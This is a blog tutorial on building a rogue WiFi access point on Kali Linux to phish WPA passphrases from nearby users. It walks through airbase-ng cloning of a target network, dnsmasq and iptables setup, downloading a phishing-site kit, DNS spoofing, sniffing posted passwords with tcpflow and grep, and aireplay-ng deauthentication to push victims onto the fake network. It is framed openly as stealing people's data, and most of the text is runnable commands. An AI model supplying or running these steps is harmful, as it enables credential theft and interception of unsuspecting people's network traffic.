Hack WiFi: How to Setup a Fake (Rogue) Access Point on Linux | aireplay

by hash3liZer . 20 June 2018

Hack WiFi: How to Setup a Fake (Rogue) Access Point on Linux | aireplay

In this tutorial, I'll make you understand the basics of Rogue Access Point and how one can use it to sneak the target details by targetting clients, not the Access Point. Whatever, brute-forcing and Cracking tough they are good enough to crack passwords using tables and dictionaries but they couldn't provide the credibility of a Fake Access Point. So, that's where the Phishing comes handy, well by forging a network, a little nasty.

Phishing's always seemed like one of the most naive means of getting your hands on someone's data. But in this case, this would be a little harder as we will see so. So, how does this works basically?

Phishing as always said in a manner is to influence someone to perform involuntary tasks. While Rogue Network has nothing in particular. They are just simple (wireless) networks with the most basic functionality and most importantly with a forged document where the whole of the network traffic is redirected. So, the basics are is to somehow show our victims this document, no matter what kind of document it is.

Rogue AP

Now from Wiki, it is a wireless access point without the authorization of an administrator, employed by an attacker or a well-meaning employee.

In our case, What we have to do in summary is: First, we will launch the Wireless Access point, a simple one. Then we will define the traffic routing and if necessary forward the Internet traffic. After which it's all the matter of hosting a phishing site and induce the clients to interact with it. I hope you got the picture until now. A brief explanation with a picture:

rogue access point

What's Required?

Before you take a head-start. You will be required an Internet connection for some packages to download. Moreover, i am using Kali for all the testing and implementation. So, it would be better if you have Kali installed. Well, if you have Ubuntu or another Linux operating system, then just installing the required packages would be a little different but the process almost remains the same.



First, we will install the required packages which in our case is just one, dnsmasq. Other important packages are apache2, airbase-ng, MySQL. If you are kali user, you will have these packages already installed besides dnsmasq. So,

apt-get install dnsmasq
apt-get install dnsmasq


Monitor Interface

Now, we need a wireless Card that supports promiscous mode and packet injection. Search for your adapter interface and put it in monitor mode. In my case interface is wlan1. So,


To, put it in monitor mode:

airmon-ng start wlan1

This will put your wireless card in monitor mode and rename it from wlan1 to wlan1mon



Launch the wireless Access Point with airbase-ng which is included in the airmon-ng utility. This allows users to host APs with or without procotols and help them test various vulnerable versions of employed security. Usage:

airbase-ng --essid "Access Point" -c 6 -P -vv wlan1mon

Note the above arguments:

  • --essid: Name of Wireless Access Point. It should be the name of target AP.
  • -c: Should be the channel on which target AP is operating.
  • -vv: Verbose mode, prints messages in more detail.
  • wlan1mon: Monitor Mode Interface to use.

Airbase-ng setups a new tapped interface atN, where N is a positive integer which then further is used to manage the network instead of wlanNmon interface.



Now, we have to define routing tables and traffic information for the access point. So, that data could flow in the network and we be able to develop connections with other clients or vice virsa. We have dnsmasq for this part. Setup a new configuration file for dnsmasq with name dnsmasq.conf and copy/paste the below code.

sudo nano dnsmasq.conf

Note these paramters in the above instructions.

  • interface=: Should be the interface on which Access Point is hosted, i.e. at0
  • dhcp-range=: IP Range for network clients. 12h is the lease time.
  • dhcp-option=3: Gateway IP for the networks.
  • dhcp-option=6: DNS Server.
  • listen-address: Bind DHCP to local IP.

Kick-start dnsmasq

sudo dnsmasq -C dnsmasq.conf -d
dnsmasq dnsmasq.conf

Assign the network Gateway and netmask to the interface and add the routing table.

ifconfig at0 up netmask
route add -net netmask gw


Traffic Forwarding (Optional)

Now, this is optional. This is to provide our victims Internet Access. So, clients could use it as a usual network and you could passively perform ill-natured attacks. MITM and other attacks like ARP spoofing, DNS spoofing could be easily possible by providing clients internet access. Change some firewall rules and allow traffic forwarding:

iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT

Note these two parameters in the last two commands:

  • --out-interface: interface from where to forward traffic to at0, i.e eth0
  • --in-interface: Interface to which traffic is being forwarded, i.e. at0

Now, just one step to go..

echo 1 > /proc/sys/net/ipv4/ip_forward


Phishing Site.

Now, what's remaining is the site. Well, it's better to keep the code and scope minimal. I'll try to make things much simpler as i can. What we will do is host a site at first on apache web server. This site somehow would be presented to user, i.e. the target. Well, the main thing is getting what's entered in the fields. We will see the real jargon in the subsequent steps. But for now, let's stick to the site. Download this phishing site:

wget https://www.shellvoide.com/media/files/rogueap.zip

Unzip the file which will give you a folder by the name RogueAP. Move all of this folder files to apache default hosting directory:

rm -rf /var/www/html/*
unzip rogueap.zip -d /var/www/html

Kick-Start apache service:

systemctl start apache2

Make sure if it started successfully:

service apache2 status
service apache2 status

To ensure that the site is hosted perfectly, navigate to the link and make sure if you are able to see the site. Screenshot of how it will look is given below:

wifi phishing



Now, we have to sniff the data that will be posted along the headers to apache server. But before that we will spoof all the received requests to the site for maximum effect. Use dnsspoof:

dnsspoof -i at0

Note that this will only work for non-HSTS sites or those which are not yet visited by the browser. So, the only thing now is tracking the passwords. For which we will use tcpflow. Type in the following command:

sudo tcpflow -i any -C -g port 80 | grep -i "password1="

What's happening here is, we are getting whole the traffic travelling in the network. From this traffice, sure we don't need any data except that one POST request to the local site which contains the passwords. Here, tcpflow is capturing the request data and piping the output to grep which is filtering the output to find the line with password1=.



Now, you can dissociate your target clients and force them to connect your Rogue AP. To dissociate, we will use aireplay-ng.

$ aireplay-ng -00 -a [BSSID of AP] [Interface]

A successful attack...


Coming on to the victim side, suppose that victim's already connected to the Rogue AP and is redirected to Phishing site which makes him know that his router's firmware is out-of-date and requires update. As soon, she enter's the data in password fields and send it to server, we will be notified on the tcpflow terminal:


So, the required WPA passphrase is password123.


So, we saw what is a Fake (Rogue) access point and how one can use it to steal someone's data on the fly. Well, Rogue access points are sometimes difficult to maintain and setup for because you wisely have to choose your wireless adapter and it demands a little knowledge of yours about network and servers. Whatever, in this tutorial, we saw just the minimal usage of it. For more keep reading and subscribe to our email newsletter.